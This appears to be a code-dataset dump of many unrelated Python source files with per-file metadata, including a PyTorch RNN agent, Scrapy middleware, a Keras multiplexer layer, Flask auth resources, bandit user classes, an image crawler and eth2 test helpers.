We give an address so that getClientIP returns a non null entry, causing us to record the MAU Decorate it to be the full path, if we're using shorthand If there's a producer, tell it to resume producing so we get content Make the thread pool synchronous. | 1,676 | en | 0.84291 |
import torch.nn as nn
import torch.nn.functional as F
class RNNAgent(nn.Module):
def __init__(self, input_shape, args):
super(RNNAgent, self).__init__()
self.args = args
self.fc1 = nn.Linear(input_shape, args.rnn_hidden_dim)
self.rnn = nn.GRUCell(args.rnn_hidden_dim, args.rnn_hidden_dim)
if not args.levin_flag_quantile:
self.fc2 = nn.Linear(args.rnn_hidden_dim, args.n_actions)
else:
self.fc2 = nn.Linear(args.rnn_hidden_dim, args.n_actions * args.N_QUANT)
def init_hidden(self):
        # make hidden states on the same device as the model
        # (mainly used by the controllers)
return self.fc1.weight.new(1, self.args.rnn_hidden_dim).zero_()
def forward(self, inputs, hidden_state):
mb_size = inputs.size(0)
x = F.relu(self.fc1(inputs))
h_in = hidden_state.reshape(-1, self.args.rnn_hidden_dim)
h = self.rnn(x, h_in)
if not self.args.levin_flag_quantile:
q = self.fc2(h)
else:
q = self.fc2(h).view(mb_size, self.args.n_actions, self.args.N_QUANT)
return q, h
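# Minimal usage sketch (the args values are illustrative assumptions, not taken
# from any real config): build an agent, initialise the hidden state for a
# batch of three agents and run one forward pass.
if __name__ == "__main__":
    from types import SimpleNamespace
    import torch
    args = SimpleNamespace(rnn_hidden_dim=64, n_actions=5,
                           levin_flag_quantile=False, N_QUANT=8)
    agent = RNNAgent(input_shape=42, args=args)
    hidden = agent.init_hidden().expand(3, -1)  # one hidden state per agent
    obs = torch.rand(3, 42)
    q, hidden = agent(obs, hidden)
    print(q.shape, hidden.shape)  # torch.Size([3, 5]) torch.Size([3, 64])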
| src_convention/modules/agents/rnn_agent.py | 1,138 | make hidden states on same device as model 主要是在 controllers 中使用 | 63 | zh | 0.605508 |
# -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class TutorialSpiderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the spider middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_spider_input(self, response, spider):
# Called for each response that goes through the spider
# middleware and into the spider.
# Should return None or raise an exception.
return None
def process_spider_output(self, response, result, spider):
# Called with the results returned from the Spider, after
# it has processed the response.
# Must return an iterable of Request, dict or Item objects.
for i in result:
yield i
def process_spider_exception(self, response, exception, spider):
# Called when a spider or process_spider_input() method
# (from other spider middleware) raises an exception.
# Should return either None or an iterable of Response, dict
# or Item objects.
pass
def process_start_requests(self, start_requests, spider):
# Called with the start requests of the spider, and works
# similarly to the process_spider_output() method, except
# that it doesn’t have a response associated.
# Must return only requests (not items).
for r in start_requests:
yield r
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
class TutorialDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
@classmethod
def from_crawler(cls, crawler):
# This method is used by Scrapy to create your spiders.
s = cls()
crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
return s
def process_request(self, request, spider):
# Called for each request that goes through the downloader
# middleware.
# Must either:
# - return None: continue processing this request
# - or return a Response object
# - or return a Request object
# - or raise IgnoreRequest: process_exception() methods of
# installed downloader middleware will be called
return None
def process_response(self, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
def process_exception(self, request, exception, spider):
# Called when a download handler or a process_request()
# (from other downloader middleware) raises an exception.
# Must either:
# - return None: continue processing this exception
# - return a Response object: stops process_exception() chain
# - return a Request object: stops process_exception() chain
pass
def spider_opened(self, spider):
spider.logger.info('Spider opened: %s' % spider.name)
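# To activate either class it must be enabled in the project's settings.py;
# the priority values below are the ones used by the default Scrapy template
# and can be adjusted:
#
#     SPIDER_MIDDLEWARES = {
#         'tutorial.middlewares.TutorialSpiderMiddleware': 543,
#     }
#     DOWNLOADER_MIDDLEWARES = {
#         'tutorial.middlewares.TutorialDownloaderMiddleware': 543,
#     }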
| tutorial/tutorial/middlewares.py | 3,601 | -*- coding: utf-8 -*- Define here the models for your spider middleware See documentation in: https://doc.scrapy.org/en/latest/topics/spider-middleware.html Not all methods need to be defined. If a method is not defined, scrapy acts as if the spider middleware does not modify the passed objects. This method is used by Scrapy to create your spiders. Called for each response that goes through the spider middleware and into the spider. Should return None or raise an exception. Called with the results returned from the Spider, after it has processed the response. Must return an iterable of Request, dict or Item objects. Called when a spider or process_spider_input() method (from other spider middleware) raises an exception. Should return either None or an iterable of Response, dict or Item objects. Called with the start requests of the spider, and works similarly to the process_spider_output() method, except that it doesn’t have a response associated. Must return only requests (not items). Not all methods need to be defined. If a method is not defined, scrapy acts as if the downloader middleware does not modify the passed objects. This method is used by Scrapy to create your spiders. Called for each request that goes through the downloader middleware. Must either: - return None: continue processing this request - or return a Response object - or return a Request object - or raise IgnoreRequest: process_exception() methods of installed downloader middleware will be called Called with the response returned from the downloader. Must either; - return a Response object - return a Request object - or raise IgnoreRequest Called when a download handler or a process_request() (from other downloader middleware) raises an exception. Must either: - return None: continue processing this exception - return a Response object: stops process_exception() chain - return a Request object: stops process_exception() chain | 1,931 | en | 0.87019 |
from keras.engine.topology import Layer
from keras.backend.tensorflow_backend import tf
class Multiplexer(Layer):
def __init__(self, output_dim, nb_ctrl_sig, **kwargs):
"""
This layer is used to split the output of a previous Dense layer into
nb_ctrl_sig groups of size output_dim, and choose which group to provide
as output using a discrete control signal.
It takes as input two tensors, namely the output of the previous layer
and a column tensor with int32 or int64 values for the control signal.
The Dense input to this layer must be of shape (None, prev_output_dim),
where prev_output_dim = output_dim * nb_ctrl_sig.
No checks are done at runtime to ensure that the input to the layer is
correct, so it's better to double check.
An example usage of this layer may be:
input = Input(shape=(3,))
control = Input(shape=(1,), dtype='int32')
        hidden = Dense(6)(input) # output_dim == 2, nb_ctrl_sig == 3
output = Multiplexer(2, 3)([hidden, control])
model = Model(input=[input, control], output=output)
...
x = randn(3) # Input has size 3
ctrl = array([0, 1, 2])
# Outputs the first two neurons of the Dense layer
model.predict([x, ctrl[0]])
# Outputs the middle two neurons of the Dense layer
model.predict([x, ctrl[1]])
# Outputs the last two neurons of the Dense layer
model.predict([x, ctrl[2]])
# Arguments
output_dim: positive integer, dimensionality of the output space.
nb_ctrl_sig: positive integer, number of groups in which to split
the output of the previous layer. Must satisfy the relation:
input_size = nb_ctrl_sig * output_dim
"""
self.output_dim = output_dim
self.nb_ctrl_sig = nb_ctrl_sig
super(Multiplexer, self).__init__(**kwargs)
def build(self, input_shape):
super(Multiplexer, self).build(input_shape)
def call(self, args, mask=None):
return self.multiplexer(args, self.output_dim, self.nb_ctrl_sig)
def get_output_shape_for(self, input_shape):
return input_shape[0], self.output_dim
def compute_output_shape(self, input_shape):
assert input_shape and len(input_shape) >= 2
assert input_shape[-1]
output_shape = list(input_shape)
output_shape[-1] = self.output_dim
return tuple(output_shape)
@staticmethod
def multiplexer(args, output_size, nb_actions):
"""
Returns a tensor of shape (None, output_size) where each sample is
the result of masking each sample in full_input with a binary mask that
preserves only output_size elements, based on the corresponding control
value in indices.
"""
full_input, indices = args
'''
For example, given:
full_input: [[1, 2, 3, 4, 5, 6], [7, 8, 9, 10, 11, 12]]
nb_actions: 3
output_size: 2
indices: [[0], [2]]
desired output: [[1, 2], [11, 12]]
we want to output the first two elements (index 0) of the first sample
and the last two elements (index 2) of the second sample.
To do this, we need the absolute indices [[0, 1], [4, 5]].
To build these, first compute the base absolute indices (0 and 4) by
multiplying the control indices for the output size:
[[0], [2]] * 2 = [[0], [4]]
'''
base_absolute_indices = tf.multiply(indices, output_size)
'''
Build an array containing the base absolute indices repeated output_size
times:
[[0, 0], [4, 4]]
'''
bai_repeated = tf.tile(base_absolute_indices, [1, output_size])
'''
Finally, add range(output_size) to these tensors to get the full
absolute indices:
[0, 0] + [0, 1] = [0, 1]
[4, 4] + [0, 1] = [4, 5]
so we have:
[[0, 1], [4, 5]]
'''
absolute_indices = tf.add(bai_repeated, tf.range(output_size))
'''
Flatten this tensor in order to compute the one hot encoding for each
absolute index:
[0, 1, 4, 5]
'''
ai_flat = tf.reshape(absolute_indices, [-1])
'''
Compute the one-hot encoding for the absolute indices.
From [0, 1, 4, 5] we get:
[[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 1]]
'''
ai_onehot = tf.one_hot(ai_flat, output_size * nb_actions)
'''
Build the mask for full_input from the one-hot-encoded absolute indices.
We need to group the one-hot absolute indices into groups of output_size
elements.
We get:
[
[[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0]],
[[0, 0, 0, 0, 1, 0], [0, 0, 0, 0, 0, 1]]
]
'''
group_shape = [-1, output_size, output_size * nb_actions]
group = tf.reshape(ai_onehot, group_shape)
'''
Reduce_sum along axis 1 to collapse the group and get the binary masks.
[[1, 1, 0, 0, 0, 0], [0, 0, 0, 0, 1, 1]]
'''
masks = tf.reduce_sum(group, axis=1)
'''
Convert the mask to boolean.
[[True, True, False, False, False, False],
[False, False, False, False, True, True]]
'''
zero = tf.constant(0, dtype=tf.float32)
bool_masks = tf.not_equal(masks, zero)
'''
Convert the boolean masks back to absolute indices for the full_input
tensor (each element represents [sample index, value index]).
We get:
[[0, 0], [0, 1], [1, 4], [1, 5]]
'''
ai_mask = tf.where(bool_masks)
'''
Apply the masks to full_input. We get a 1D tensor:
[1, 2, 11, 12]
'''
reduced_output = tf.gather_nd(full_input, ai_mask)
'''
Reshape the reduction to match the output shape.
We get:
[[1, 2], [11, 12]]
'''
return tf.reshape(reduced_output, [-1, output_size])
| multiplexer.py | 6,374 | This layer is used to split the output of a previous Dense layer into
nb_ctrl_sig groups of size output_dim, and choose which group to provide
as output using a discrete control signal.
It takes as input two tensors, namely the output of the previous layer
and a column tensor with int32 or int64 values for the control signal.
The Dense input to this layer must be of shape (None, prev_output_dim),
where prev_output_dim = output_dim * nb_ctrl_sig.
No checks are done at runtime to ensure that the input to the layer is
correct, so it's better to double check.
An example usage of this layer may be:
input = Input(shape=(3,))
control = Input(shape=(1,), dtype='int32')
hidden = Dense(6)(i) # output_dim == 2, nb_ctrl_sig == 3
output = Multiplexer(2, 3)([hidden, control])
model = Model(input=[input, control], output=output)
...
x = randn(3) # Input has size 3
ctrl = array([0, 1, 2])
# Outputs the first two neurons of the Dense layer
model.predict([x, ctrl[0]])
# Outputs the middle two neurons of the Dense layer
model.predict([x, ctrl[1]])
# Outputs the last two neurons of the Dense layer
model.predict([x, ctrl[2]])
# Arguments
output_dim: positive integer, dimensionality of the output space.
nb_ctrl_sig: positive integer, number of groups in which to split
the output of the previous layer. Must satisfy the relation:
input_size = nb_ctrl_sig * output_dim
Returns a tensor of shape (None, output_size) where each sample is
the result of masking each sample in full_input with a binary mask that
preserves only output_size elements, based on the corresponding control
value in indices. | 1,713 | en | 0.71992 |
# -*- coding: utf-8 -*-
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.documents import urls as wagtaildocs_urls
urlpatterns = [
url(r'^django-admin/', admin.site.urls),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| aldryn_wagtail/urls.py | 732 | -*- coding: utf-8 -*- Serve static and media files from development server | 74 | en | 0.882196 |
#! /usr/bin/python
import sys,shutil, urllib2, json, time, subprocess, os, commands, signal, re
sys.path.insert(0, 'srch2lib')
import test_lib
port = '8087'
# This test case reads data from the json files
# Then it reads all the access control data from json files too
# Then it does some search and it uses roleId in the query
# And all the results should have this roleId in their access list
# it reads the keywords and role ids from queriesAndResults.txt file
# the format of each line in this file is like:
# coreName keyword roleid || results
# example : core1 hello 103 || 12 14 18
#Function of checking the results
def checkResult(query, responseJson,resultValue):
# for key, value in responseJson:
# print key, value
isPass=1
if len(responseJson) == len(resultValue):
for i in range(0, len(resultValue)):
#print response_json['results'][i]['record']['id']
if (resultValue.count(responseJson[i]['record']['id']) != 1):
isPass=0
print query+' test failed'
print 'query results||given results'
print 'number of results:'+str(len(responseJson))+'||'+str(len(resultValue))
for i in range(0, len(responseJson)):
print str(responseJson[i]['record']['id']) + '||' + resultValue[i]
break
else:
isPass=0
print query+' test failed - differing response lengths'
print 'query results||given results'
print 'number of results:'+str(len(responseJson))+'||'+str(len(resultValue))
maxLen = max(len(responseJson),len(resultValue))
for i in range(0, maxLen):
if i >= len(resultValue):
print str(responseJson[i]['record']['id'])+'||'
elif i >= len(responseJson):
print ' '+'||'+resultValue[i]
else:
print responseJson[i]['record']['id']+'||'+resultValue[i]
if isPass == 1:
print query+' test pass'
return 0
return 1
#prepare the query based on the valid syntax
def prepareQuery(queryKeyword, roleId, fuzzy):
query = ''
################# prepare main query part
query = query + 'q='
# local parameters
# query = query + '%7BdefaultPrefixComplete=COMPLETE%7D'
# keywords section
if fuzzy:
keyword = queryKeyword + '~'
else:
keyword = queryKeyword
query=query+keyword+'&'
# print 'Query : ' + query
##################################
query = query + 'roleId=' + roleId
return query
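# For example, prepareQuery('hello', '103', False) returns 'q=hello&roleId=103'
# and prepareQuery('hello', '103', True) returns 'q=hello~&roleId=103'.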
def testMultipleCores(queriesAndResultsPath, binary_path):
#Start the engine server
args = [ binary_path, '--config-file=./access_control/conf-acl.xml' ]
if test_lib.confirmPortAvailable(port) == False:
print 'Port ' + str(port) + ' already in use - aborting'
return -1
print 'starting engine: ' + args[0] + ' ' + args[1]
serverHandle = test_lib.startServer(args)
test_lib.pingServer(port)
failCount = 0
print "Test core1 - access control"
f_in = open(queriesAndResultsPath, 'r')
for line in f_in:
#get the query keyword and results
value=line.split('||')
if(value[0] == 'S'):
queryValue=value[1].split(' ')
allResults=value[2].split('@')
for coreResult in allResults:
resultValue=coreResult.split()
#construct the query
query='http://localhost:' + port + '/' + queryValue[0] + '/search?'
query = query + prepareQuery(queryValue[1], queryValue[2], False)
#do the query
response = urllib2.urlopen(query).read()
response_json = json.loads(response)
#check the result
failCount += checkResult(query, response_json['results'], resultValue)
else:
# the line is command query (insert/delete/update/acl etc)
coreName = value[1]
command = value[2]
payload = value[3]
if coreName == "":
query='http://localhost:' + port + '/' + command
else:
query='http://localhost:' + port + '/' + coreName + '/' + command
print query
request = urllib2.Request(query, data=payload)
request.get_method = lambda: 'PUT'
opener = urllib2.build_opener(urllib2.HTTPHandler)
url = opener.open(request)
time.sleep(1)
time.sleep(5)
test_lib.killServer(serverHandle)
print '=============================='
return failCount
if __name__ == '__main__':
if(os.path.exists("./access-control/core1Data")):
shutil.rmtree("./access-control/core1Data")
if(os.path.exists("./access-control/core2Data")):
shutil.rmtree("./access-control/core2Data")
if(os.path.exists("./access-control/core3Data")):
shutil.rmtree("./access-control/core3Data")
if(os.path.exists("./access-control/core4Data")):
shutil.rmtree("./access-control/core4Data")
#Path of the query file
#each line like "core1 trust 1000||01c90b4effb2353742080000" ---- coreName query roleId||record_ids(results)
binary_path = sys.argv[1]
queriesAndResultsPath = sys.argv[2]
exitCode = testMultipleCores(queriesAndResultsPath, binary_path)
if(os.path.exists("./access-control/core1Data")):
shutil.rmtree("./access-control/core1Data")
if(os.path.exists("./access-control/core2Data")):
shutil.rmtree("./access-control/core2Data")
if(os.path.exists("./access-control/core3Data")):
shutil.rmtree("./access-control/core3Data")
if(os.path.exists("./access-control/core4Data")):
shutil.rmtree("./access-control/core4Data")
os._exit(exitCode)
| test/wrapper/system_tests/access_control/record-based-ACL.py | 5,842 | ! /usr/bin/python This test case reads data from the json files Then it reads all the access control data from json files too Then it does some search and it uses roleId in the query And all the results should have this roleId in their access list it reads the keywords and role ids from queriesAndResults.txt file the format of each line in this file is like: coreName keyword roleid || results example : core1 hello 103 || 12 14 18Function of checking the results for key, value in responseJson: print key, valueprint response_json['results'][i]['record']['id']prepare the query based on the valid syntax prepare main query part local parameters query = query + '%7BdefaultPrefixComplete=COMPLETE%7D' keywords section print 'Query : ' + queryStart the engine serverget the query keyword and resultsconstruct the querydo the querycheck the result the line is command query (insert/delete/update/acl etc)Path of the query fileeach line like "core1 trust 1000||01c90b4effb2353742080000" ---- coreName query roleId||record_ids(results) | 1,057 | en | 0.648562 |
# SPDX-FileCopyrightText: Copyright 2021, Siavash Ameli <sameli@berkeley.edu>
# SPDX-License-Identifier: BSD-3-Clause
# SPDX-FileType: SOURCE
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the license found in the LICENSE.txt file in the root directory
# of this source tree.
# =======
# Imports
# =======
import sympy
# ==========================
# Declare symbolic variables
# ==========================
n = sympy.symbols('n', integer=True, positive=True)
t = sympy.symbols('t', real=True, positive=True)
| ortho/_orthogonal_functions/declarations.py | 563 | SPDX-FileCopyrightText: Copyright 2021, Siavash Ameli <sameli@berkeley.edu> SPDX-License-Identifier: BSD-3-Clause SPDX-FileType: SOURCE This program is free software: you can redistribute it and/or modify it under the terms of the license found in the LICENSE.txt file in the root directory of this source tree. ======= Imports ======= ========================== Declare symbolic variables ========================== | 416 | en | 0.646381 |
from abc import ABC, abstractmethod
import random
import torch
import torch.nn as nn
import torch.nn.functional as F
class mab_user(ABC):
def __init__(self, n_arms, lamb=1):
super(mab_user, self).__init__()
self.t = torch.tensor(1.0)
self.r = torch.zeros(n_arms)
self.n = torch.zeros(n_arms)
self.id = -1
self.returns = 0
self.lamb = lamb
@abstractmethod
def choose(self):
pass
@abstractmethod
def update(self, arm, reward):
pass
class perfect_user(mab_user):
# users that always make perfect decision -- can be paired with recEngines
# in CF simulations
def __init__(self, n_arms):
super().__init__(n_arms)
def setup_learners(self, learners):
#this setup routine must be called before perfect_user can run
self.learners = learners
def choose(self):
l_max = [0]*len(self.learners)
for i,learner in enumerate(self.learners):
l_max[i] = torch.max(learner.U[self.id] @ learner.V.t())
return torch.argmax(torch.tensor(l_max))
def update(self, arm, reward):
pass
class ucb_user(mab_user):
def __init__(self, n_arms):
super().__init__(n_arms)
def _ranking(self):
return self.r + self.lamb*torch.sqrt(2*torch.log(self.t)/self.n)
def choose(self):
return torch.argmax(self._ranking())
def update(self, arm, reward):
self.r[arm] = self.r[arm]*(self.n[arm]) + reward
self.n[arm] += 1
self.r[arm] /= self.n[arm]
self.t += 1
self.returns += reward
class e_greedy_user(ucb_user):
def __init__(self, n_arms, eps_scaling=0.333, r_tol=1e-20, eps0=1.0):
super().__init__(n_arms)
self.eps_scaling = eps_scaling
self.eps = eps0
self.eps0 = eps0
self.n_arms = n_arms
self.r_tol = r_tol
def choose(self):
if random.random() > self.eps:
a = torch.argmax(self.r + self.r_tol*torch.randn(self.r.shape))
else:
a = random.randint(0,self.n_arms-1)
return a
def update(self, arm, reward):
super().update(arm, reward)
self.eps = self.eps0/(self.t**self.eps_scaling)
class sw_ucb_user(mab_user):
    def __init__(self, n_arms):
        super(sw_ucb_user, self).__init__(n_arms)
        self.n_arms = n_arms
        self.t = torch.tensor(1.0)
        self.tau = 0.0  # sliding-window length, assumed to start at zero
        self.sw_r = []
        self.sw_arms = []
        self.n = torch.zeros(self.n_arms)
        self.r = torch.zeros(self.n_arms)
        self.alpha = 0.9
        self.lamb = 1
        self.id = -1
        self.returns = 0
    def _ranking(self):
        return self.r/self.n + self.lamb*torch.sqrt(
            (1+self.alpha)*torch.log(self.t)/self.n)
    def choose(self):  # mirrors ucb_user.choose; required by the mab_user ABC
        return torch.argmax(self._ranking())
    def update(self, arm, reward):
        self.sw_arms.append(arm)
        self.sw_r.append(reward)
        self.r[arm] += reward
        self.returns += reward
        self.n[arm] += 1
        tau_prime = torch.min(torch.ceil(self.lamb*(self.t**self.alpha)),self.t)
        delta_tau = tau_prime - self.tau
        if delta_tau < 1.0:
            # window did not grow: evict the oldest observation
            old_arm = self.sw_arms.pop(0)
            self.r[old_arm] -= self.sw_r.pop(0)
            self.n[old_arm] -= 1
        self.tau = tau_prime
        self.t += 1
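# Minimal usage sketch (the arm probabilities are made up for illustration):
# run an epsilon-greedy user against three Bernoulli arms and print the total
# return it collects.
if __name__ == "__main__":
    arm_probs = [0.2, 0.5, 0.8]
    user = e_greedy_user(n_arms=len(arm_probs))
    for _ in range(500):
        arm = int(user.choose())
        reward = 1.0 if random.random() < arm_probs[arm] else 0.0
        user.update(arm, reward)
    print("total return:", user.returns)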
| user.py | 3,272 | users that always make perfect decision -- can be paired with recEngines in CF simulationsthis setup routine must be called before perfect_user can run | 152 | en | 0.893964 |
from flask import request, jsonify
from flask_restful import Resource, reqparse, abort
from flask_jwt import current_app
from app.auth.models import User
def generate_token(user):
""" Currently this is workaround
since the latest version that already has this function
is not published on PyPI yet and we don't want
to install the package directly from GitHub.
See: https://github.com/mattupstate/flask-jwt/blob/9f4f3bc8dce9da5dd8a567dfada0854e0cf656ae/flask_jwt/__init__.py#L145
"""
jwt = current_app.extensions['jwt']
token = jwt.jwt_encode_callback(user)
return token
class SignUpResource(Resource):
parser = reqparse.RequestParser(bundle_errors=True)
parser.add_argument('email', type=str, required=True)
parser.add_argument('password', type=str, required=True)
def post(self):
args = self.parser.parse_args()
if not User.query.filter_by(email=args['email']).scalar():
User(
email = args['email'],
password = args['password']
).save()
return {'message': 'Sign up successfully'}
abort(400, message='Email already exists.')
class LoginResource(Resource):
parser = reqparse.RequestParser(bundle_errors=True)
parser.add_argument('email', type=str, required=True)
parser.add_argument('password', type=str, required=True)
def post(self):
args = self.parser.parse_args()
user = User.query.filter_by(email=args['email']).first()
if user is not None and user.verify_password(args['password']):
token = generate_token(user)
return jsonify({'token': token.decode("utf-8")})
abort(400, message='Invalid credentials')
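# Wiring sketch (the URL paths are assumptions, not taken from this app): the
# resources are expected to be registered on a Flask-RESTful Api elsewhere,
# for example:
#
#     from flask_restful import Api
#     api = Api(app)
#     api.add_resource(SignUpResource, '/auth/signup')
#     api.add_resource(LoginResource, '/auth/login')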
| Chapter04/app/auth/resources.py | 1,732 | Currently this is workaround
since the latest version that already has this function
is not published on PyPI yet and we don't want
to install the package directly from GitHub.
See: https://github.com/mattupstate/flask-jwt/blob/9f4f3bc8dce9da5dd8a567dfada0854e0cf656ae/flask_jwt/__init__.py#L145 | 295 | en | 0.894915 |
import unittest
import cryptomon.common as common
class Testcryptomon(unittest.TestCase):
def setUp(self):
self.response = [
{
"id": "bitcoin",
"name": "Bitcoin",
"symbol": "BTC",
"rank": "1",
"price_usd": "15653.3",
"price_btc": "1.0",
"24h_volume_usd": "14446900000.0",
"market_cap_usd": "261915508097",
"available_supply": "16732287.0",
"total_supply": "16732287.0",
"max_supply": "21000000.0",
"percent_change_1h": "0.75",
"percent_change_24h": "4.73",
"percent_change_7d": "34.5",
"last_updated": "1512920953",
"price_eur": "13304.365802",
"24h_volume_eur": "12278998186.0",
"market_cap_eur": "222612466952"
},
{
"id": "ethereum",
"name": "Ethereum",
"symbol": "ETH",
"rank": "2",
"price_usd": "452.479",
"price_btc": "0.0288748",
"24h_volume_usd": "1736900000.0",
"market_cap_usd": "43552764899.0",
"available_supply": "96253671.0",
"total_supply": "96253671.0",
"percent_change_1h": "0.58",
"percent_change_24h": "-7.03",
"percent_change_7d": "-5.36",
"last_updated": "1512920957",
"price_eur": "384.58000126",
"24h_volume_eur": "1476260786.0",
"market_cap_eur": "37017236998.0"
}
]
def test_find_data(self):
filtered_data = common.find_data(self.response, ['BTC'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['btc'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['eth'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['ETH'])
self.assertEqual(len(filtered_data), 1)
filtered_data = common.find_data(self.response, ['LTC'])
self.assertEqual(len(filtered_data), 0)
filtered_data = common.find_data(self.response, ['BTC', 'eth'])
self.assertEqual(len(filtered_data), 2)
filtered_data = common.find_data(self.response, ['BTC', 'eth', 'ltc'])
self.assertEqual(len(filtered_data), 2)
def test_tabulate_data(self):
tabulated_data = common.process_data(self.response)
self.assertEqual(len(tabulated_data), 3)
# all items must have same number of fields
for item in tabulated_data:
self.assertEqual(len(item), len(tabulated_data[0]))
self.assertEqual(tabulated_data[0][0], common.fields_good_name["rank"])
self.assertEqual(tabulated_data[0][1], common.fields_good_name["symbol"])
self.assertEqual(tabulated_data[0][2], common.fields_good_name["price"])
self.assertEqual(tabulated_data[0][3], common.fields_good_name["percent_change_24h"])
self.assertEqual(tabulated_data[0][4], common.fields_good_name["percent_change_1h"])
self.assertEqual(tabulated_data[0][5], common.fields_good_name["market_cap"])
if __name__ == '__main__':
unittest.main(verbosity=2)
| tests/test_cryptomon.py | 3,436 | all items must have same number of fields | 41 | en | 0.90827 |
import logging
import random
import re
from urllib.parse import urljoin
from urllib.parse import urlparse
import requests
from bs4 import BeautifulSoup
logger = logging.getLogger(__name__)
IMAGE_FILE_REGEX = re.compile(r'([-\w]+\.(?:jpg|jpeg|gif|png))',
re.IGNORECASE)
def crawl_page(project_data, prerequisites):
""" Picks a random image off of the passed URL."""
result = {
'status': 'success',
'image': None
}
url = project_data.get('url')
if not url:
result['status'] = 'error'
result['error_message'] = 'URL was not provided.'
return result
# Crawl the website for images.
logger.info('Starting to crawl %s', url)
images = find_images(url)
num_images = len(images)
logger.info('Found %s images', num_images)
if num_images == 0:
result['status'] = 'error'
result['error_message'] = 'Unable to find images at the provided URL.'
return result
# Return a random one.
logger.info('Picking a random one...')
image = random.choice(list(images))
result['image'] = image
return result
def find_images(url):
""" Fetches a url's HTML and extracts all image sources in an <img> tag.
"""
images = set()
# Fetch the content.
headers = {
'User-Agent': ('Mozilla/5.0 (compatible; OrchestraBot/1.0; '
'noreply@example.org)'),
}
response = requests.get(url, headers=headers)
if response.status_code < 200 or response.status_code >= 300:
logger.error("Couldn't fetch url {}".format(url))
return images
content = response.text
# Find images in the content.
soup = BeautifulSoup(content)
tags = soup.find_all('img', src=IMAGE_FILE_REGEX)
for tag in tags:
link = tag.get('src')
if link is None:
continue
if not bool(urlparse(link).netloc):
link = urljoin(url, link)
images.add(link)
return images
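# Minimal usage sketch (the URL is a placeholder): crawl a page and print the
# chosen image, or the error details if no image was found.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    outcome = crawl_page({'url': 'https://example.org/'}, prerequisites=None)
    print(outcome)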
| simple_workflow/v1/crawl.py | 2,010 | Picks a random image off of the passed URL.
Fetches a url's HTML and extracts all image sources in an <img> tag.
Crawl the website for images. Return a random one. Fetch the content. Find images in the content. | 217 | en | 0.75655 |
import math
import random
from typing import Dict, Iterable, Sequence, Tuple
from eth.constants import ZERO_HASH32
from eth_typing import BLSPubkey, BLSSignature, Hash32
from eth_utils import to_tuple
from eth_utils.toolz import keymap as keymapper
from eth_utils.toolz import pipe
from eth2._utils.bitfield import get_empty_bitfield, set_voted
from eth2._utils.bls import Domain, bls
from eth2.beacon.committee_helpers import (
get_committee_count,
get_crosslink_committee,
get_shard_delta,
get_start_shard,
)
from eth2.beacon.helpers import (
compute_domain,
compute_epoch_of_slot,
compute_start_slot_of_epoch,
get_active_validator_indices,
get_block_root,
get_block_root_at_slot,
get_domain,
)
from eth2.beacon.signature_domain import SignatureDomain
from eth2.beacon.state_machines.base import BaseBeaconStateMachine
from eth2.beacon.types.attestation_data import AttestationData
from eth2.beacon.types.attestation_data_and_custody_bits import (
AttestationDataAndCustodyBit,
)
from eth2.beacon.types.attestations import Attestation, IndexedAttestation
from eth2.beacon.types.attester_slashings import AttesterSlashing
from eth2.beacon.types.blocks import BeaconBlockHeader
from eth2.beacon.types.checkpoints import Checkpoint
from eth2.beacon.types.crosslinks import Crosslink
from eth2.beacon.types.deposit_data import DepositData
from eth2.beacon.types.pending_attestations import PendingAttestation
from eth2.beacon.types.proposer_slashings import ProposerSlashing
from eth2.beacon.types.states import BeaconState
from eth2.beacon.types.voluntary_exits import VoluntaryExit
from eth2.beacon.typing import (
Bitfield,
CommitteeIndex,
Epoch,
Gwei,
Shard,
Slot,
ValidatorIndex,
default_bitfield,
default_epoch,
default_shard,
)
from eth2.configs import CommitteeConfig, Eth2Config
# TODO(ralexstokes) merge w/ below
def _mk_pending_attestation(
bitfield: Bitfield = default_bitfield,
target_root: Hash32 = ZERO_HASH32,
target_epoch: Epoch = default_epoch,
shard: Shard = default_shard,
start_epoch: Epoch = default_epoch,
parent_root: Hash32 = ZERO_HASH32,
data_root: Hash32 = ZERO_HASH32,
) -> PendingAttestation:
return PendingAttestation(
aggregation_bits=bitfield,
data=AttestationData(
target=Checkpoint(epoch=target_epoch, root=target_root),
crosslink=Crosslink(
shard=shard,
parent_root=parent_root,
start_epoch=start_epoch,
end_epoch=target_epoch,
data_root=data_root,
),
),
)
def mk_pending_attestation_from_committee(
parent: Crosslink,
committee_size: int,
shard: Shard,
target_epoch: Epoch = default_epoch,
target_root: Hash32 = ZERO_HASH32,
data_root: Hash32 = ZERO_HASH32,
) -> PendingAttestation:
bitfield = get_empty_bitfield(committee_size)
for i in range(committee_size):
bitfield = set_voted(bitfield, i)
return _mk_pending_attestation(
bitfield=bitfield,
target_root=target_root,
target_epoch=target_epoch,
shard=shard,
start_epoch=parent.end_epoch,
parent_root=parent.hash_tree_root,
data_root=data_root,
)
def _mk_some_pending_attestations_with_some_participation_in_epoch(
